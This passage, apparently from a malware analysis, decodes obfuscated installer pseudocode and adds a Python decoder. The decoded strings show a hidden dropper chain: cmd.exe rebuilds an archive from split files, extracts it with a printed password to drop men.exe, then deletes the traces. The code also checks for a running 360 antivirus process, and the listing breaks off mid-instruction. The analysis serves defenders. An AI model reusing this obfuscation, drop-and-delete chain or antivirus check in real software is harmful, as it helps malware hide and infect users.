9, 101, 110, 116, 115, 92, 109, 97, 105, 110, 46, 50, 34, 32, 34, 67, 58, 92, 85, 115, 101, 114, 115, 92, 80, 117, 98, 108, 105, 99, 92, 68, 111, 99, 117, 109, 101, 110, 116, 115, 92, 109, 97, 105, 110, 90, 84, 116, 82, 106, 84, 102, 121, 104, 78, 73, 68, 67, 65, 70, 46, 120, 109, 108, 34; string: "/c copy /b /y "C:\Users\Public\Documents\main.1" + "C:\Users\Public\Documents\main.2" "C:\Users\Public\Documents\mainZTtRjTfyhNIDCAF.xml""
Third array (25 bytes), ASCII codes: 67, 58, 92, 85, 115, 101, 114, 115, 92, 80, 117, 98, 108, 105, 99, 92, 68, 111, 99, 117, 109, 101, 110, 116, 115; string: "C:\Users\Public\Documents"
Fourth array (7 bytes), ASCII codes: 92, 109, 97, 105, 110, 46, 49; string: "\main.1"
Fifth array (7 bytes), ASCII codes: 92, 109, 97, 105, 110, 46, 50; string: "\main.2"
Sixth array (11 bytes), ASCII codes: 92, 102, 117, 110, 122, 105, 112, 46, 101, 120, 101; string: "\funzip.exe"
Seventh array (24 bytes), ASCII codes: 92, 109, 97, 105, 110, 90, 84, 116, 82, 106, 84, 102, 121, 104, 78, 73, 68, 67, 65, 70, 46, 120, 109, 108; string: "\mainZTtRjTfyhNIDCAF.xml"
Eighth array (10 bytes), ASCII codes: 104, 116, 76, 99, 69, 78, 121, 82, 70, 89; string: "htLcENyRFY"
Ninth array (10 bytes), ASCII codes: 119, 88, 115, 72, 70, 110, 85, 110, 113, 75; string: "wXsHFnUnqK"
Tenth array (7 bytes), ASCII codes: 120, 32, 45, 121, 32, 45, 112; string: "x -y -p"
Eleventh array (4 bytes), ASCII codes: 32, 45, 111, 34; string: " -o""
Twelfth array (3 bytes), ASCII codes: 34, 32, 34; string: "" ""
Thirteenth array (1 byte), ASCII code: 34; string: """
The function performs the following steps in order: it runs cmd.exe /c copy /b /y to concatenate C:\Users\Public\Documents\main.1 and main.2 into mainZTtRjTfyhNIDCAF.xml; it deletes main.1 and main.2; it checks whether funzip.exe and mainZTtRjTfyhNIDCAF.xml exist and, if both are present, runs funzip.exe x -y -p htLcENyRFYwXsHFnUnqK -o"C:\Users\Public\Documents" "C:\Users\Public\Documents\mainZTtRjTfyhNIDCAF.xml" to extract mainZTtRjTfyhNIDCAF.xml; finally it deletes mainZTtRjTfyhNIDCAF.xml.
So the extraction password for mainZTtRjTfyhNIDCAF.xml is "htLcENyRFYwXsHFnUnqK". Extracting it drops three files: men.exe, man100.dat and Server.log. Of these, man100.dat is itself a Zip archive; extracting it yields temp_adjust.dat and temp_filler.dat.
2) The "YQMBPLIVKAXLBBKHOYPB" function
In the same assembly-like pseudocode we notice another suspicious function, "YQMBPLIVKAXLBBKHOYPB". Its listing is as follows:
.function(export) void YQMBPLIVKAXLBBKHOYPB()
pushtype BOOLEAN ; StackCount = 1
pushtype UnicodeString_2 ; StackCount = 2
pushtype UnicodeString_2 ; StackCount = 3
pushtype UnicodeString_2 ; StackCount = 4
pushtype UnicodeString_2 ; StackCount = 5
pushtype UnicodeString_2 ; StackCount = 6
pushtype S32 ; StackCount = 7
pushtype BOOLEAN ; StackCount = 8
pushvar Var8 ; StackCount = 9
call INITIALIZESETUP
pop ; StackCount = 8
pop ; StackCount = 7
pushvar Var1 ; StackCount = 8
call IS360PROCESSRUNNING
pop ; StackCount = 7
pushtype BOOLEAN ; StackCount = 8
assign Var8, Var1
setz Var8
sfz Var8
pop ; StackCount = 7
jf loc_263f
pushtype BOOLEAN ; StackCount = 8
pushtype Pointer ; StackCount = 9
setptr Var9, Var7
pushtype U8_4 ; StackCount = 10
assign Var10, U8_4(1)
pushtype S32 ; StackCount = 11
assign Var11, S32(0)
pushtype UnicodeString_2 ; StackCount = 12
assign Var12, String_3("")
pushtype UnicodeString_2 ; StackCount = 13
pushtype WideString ; StackCount = 14
pushtype UnicodeString_2 ; StackCount = 15
pushtype Type30 ; StackCount = 16
pushtype Type30 ; StackCount = 17
pushtype S32 ; StackCount = 18
assign Var18, S32(12)
pushvar Var17 ; StackCount = 19
call SETARRAYLENGTH
pop ; StackCount = 18
pop ; StackCount = 17
assign Var17[0], S32(47)
assign Var17[1], S32(99)
assign Var17[2], S32(32)
assign Var17[3], S32(99)
assign Var17[4], S32(111)
assign Var17[5], S32(112)
assign Var17[6], S32(121)
assign Var17[7], S32(32)
assign Var17[8], S32(47)
assign Var17[9], S32(98)
assign Var17[10], S32(32)
assign Var17[11], S32(34)
assign Var16, Var17
pop ; StackCount = 16
pushvar Var15 ; StackCount = 17
call STRFROMCODE
pop ; StackCount = 16
pop ; StackCount = 15
assign Var14, Var15
pop ; StackCount = 14
pushtype UnicodeString_2 ; StackCount = 15
pushtype Type30 ; StackCount = 16
pushtype Type30 ; StackCount = 17
pushtype S32 ; StackCount = 18
assign Var18, S32(25)
pushvar Var17 ; StackCount = 19
call SETARRAYLENGTH
pop ; StackCount = 18
pop ; StackCount = 17
assign Var17[0], S32(67)
assign Var17[1], S32(58)
assign Var17[2], S32(92)
assign Var17[3], S32(85)
assign Var17[4], S32(115)
assign Var17[5], S32(101)
assign Var17[6], S32(114)
assign Var17[7], S32(115)
assign Var17[8], S32(92)
assign Var17[9], S32(80)
assign Var17[10], S32(117)
assign Var17[11], S32(98)
assign Var17[12], S32(108)
assign Var17[13], S32(105)
assign Var17[14], S32(99)
assign Var17[15], S32(92)
assign Var17[16], S32(68)
assign Var17[17], S32(111)
assign Var17[18], S32(99)
assign Var17[19], S32(117)
assign Var17[20], S32(109)
assign Var17[21], S32(101)
assign Var17[22], S32(110)
assign Var17[23], S32(116)
assign Var17[24], S32(115)
assign Var16, Var17
pop ; StackCount = 16
pushvar Var15 ; StackCount = 17
call STRFROMCODE
pop ; StackCount = 16
pop ; StackCount = 15
add Var14, Var15
pop ; StackCount = 14
pushtype UnicodeString_2 ; StackCount = 15
pushtype Type30 ; StackCount = 16
pushtype Type30 ; StackCount = 17
pushtype S32 ; StackCount = 18
assign Var18, S32(13)
pushvar Var17 ; StackCount = 19
call SETARRAYLENGTH
pop ; StackCount = 18
pop ; StackCount = 17
assign Var17[0], S32(92)
assign Var17[1], S32(117)
assign Var17[2], S32(110)
assign Var17[3], S32(122)
assign Var17[4], S32(105)
assign Var17[5], S32(112)
assign Var17[6], S32(46)
assign Var17[7], S32(51)
assign Var17[8], S32(34)
assign Var17[9], S32(32)
assign Var17[10], S32(43)
assign Var17[11], S32(32)
assign Var17[12], S32(34)
assign Var16, Var17
pop ; StackCount = 16
pushvar Var15 ; StackCount = 17
call STRFROMCODE
pop ; StackCount = 16
pop ; StackCount = 15
add Var14, Var15
pop ; StackCount = 14
pushtype UnicodeString_2 ; StackCount = 15
pushtype Type30 ; StackCount = 16
pushtype Ty
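Both functions hide their command lines the same way: each string is stored as an array of ASCII codes, filled one element at a time, converted with STRFROMCODE, and glued onto an accumulator (Var14 above) with assign/add. Decoding these by hand, as the tables in section 1 were, is tedious and error-prone, so the following Python script automates it over a listing in the format shown above. This is an added example, not code from the original post; the instruction syntax it parses (assign VarN[i], S32(c); pushvar; call STRFROMCODE; assign/add VarA, VarB) is taken from the listing, and the sample input is constructed here from the first three arrays of YQMBPLIVKAXLBBKHOYPB, with the codes copied from the listing. It also handles listings that arrive run together on one line, as this one did.

```python
import re

# Instruction shapes taken from the listing above (one instruction per line,
# optional "; StackCount = n" comment after the operands).
ELEM_RE = re.compile(r"^assign (Var\d+)\[(\d+)\], S32\((-?\d+)\)$")
PUSHVAR_RE = re.compile(r"^pushvar (Var\d+)")
MOVE_RE = re.compile(r"^(assign|add) (Var\d+), (Var\d+)$")
# Mnemonics used in the listing; used to re-split a listing whose line breaks were lost.
MNEMONICS = ("pushtype", "pushvar", "pop", "call", "assign", "add",
             "setz", "sfz", "setptr", "jf")
SPLIT_RE = re.compile(r"(?<=\S)(?=(?:%s)\b)" % "|".join(MNEMONICS))


def split_instructions(text):
    """Restore one-instruction-per-line form for a listing that was run together."""
    return SPLIT_RE.sub("\n", text)


def decode_strfromcode(listing):
    """Recover every string the script builds through STRFROMCODE.

    Returns (fragments, built): `fragments` lists each decoded array in program
    order; `built` maps each accumulator variable to the string assembled from
    those fragments via `assign` (start) and `add` (append).
    """
    pending = {}        # index -> ASCII code for the array being filled right now
    pushed = None       # variable most recently passed with `pushvar`
    result_var = None   # out-parameter of the last STRFROMCODE call
    last = None         # most recently decoded fragment
    fragments, built = [], {}
    for raw in listing.splitlines():
        line = raw.split(";", 1)[0].strip()   # drop the StackCount comment
        m = ELEM_RE.match(line)
        if m:
            pending[int(m.group(2))] = int(m.group(3))
            continue
        m = PUSHVAR_RE.match(line)
        if m:
            pushed = m.group(1)
            continue
        if line == "call STRFROMCODE":
            last = "".join(chr(pending[i]) for i in sorted(pending))
            fragments.append(last)
            pending, result_var = {}, pushed
            continue
        m = MOVE_RE.match(line)
        # Only moves whose source is the STRFROMCODE result extend the accumulator;
        # `assign Var16, Var17` (array copy) is deliberately ignored.
        if m and last is not None and m.group(3) == result_var:
            op, dst = m.group(1), m.group(2)
            built[dst] = last if op == "assign" else built.get(dst, "") + last
    return fragments, built


def _array_lines(var, out, codes):
    """Constructed helper: emit one STRFROMCODE array block in the listing's syntax."""
    lines = [f"assign Var18, S32({len(codes)})", f"pushvar {var} ; StackCount = 19",
             "call SETARRAYLENGTH", "pop ; StackCount = 18", "pop ; StackCount = 17"]
    lines += [f"assign {var}[{i}], S32({c})" for i, c in enumerate(codes)]
    lines += [f"assign Var16, {var}", "pop ; StackCount = 16",
              f"pushvar {out} ; StackCount = 17", "call STRFROMCODE",
              "pop ; StackCount = 16", "pop ; StackCount = 15"]
    return lines


# Constructed sample: the first three arrays of YQMBPLIVKAXLBBKHOYPB, codes copied
# from the listing above.
SAMPLE_LISTING = "\n".join(
    _array_lines("Var17", "Var15", [47, 99, 32, 99, 111, 112, 121, 32, 47, 98, 32, 34])
    + ["assign Var14, Var15", "pop ; StackCount = 14"]
    + _array_lines("Var17", "Var15", [67, 58, 92, 85, 115, 101, 114, 115, 92, 80, 117, 98,
                                      108, 105, 99, 92, 68, 111, 99, 117, 109, 101, 110, 116, 115])
    + ["add Var14, Var15", "pop ; StackCount = 14"]
    + _array_lines("Var17", "Var15", [92, 117, 110, 122, 105, 112, 46, 51, 34, 32, 43, 32, 34])
    + ["add Var14, Var15", "pop ; StackCount = 14"]
)

if __name__ == "__main__":
    frags, acc = decode_strfromcode(SAMPLE_LISTING)
    for f in frags:
        print(repr(f))
    for var, s in acc.items():
        print(f"{var} = {s!r}")
```

Run against the full listing (after split_instructions if it was pasted as one line), the accumulator string is the complete command the installer hands to cmd.exe, which is the artefact a responder wants to search for in process-creation telemetry; note that this second function concatenates a file named unzip.3 rather than main.1/main.2.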

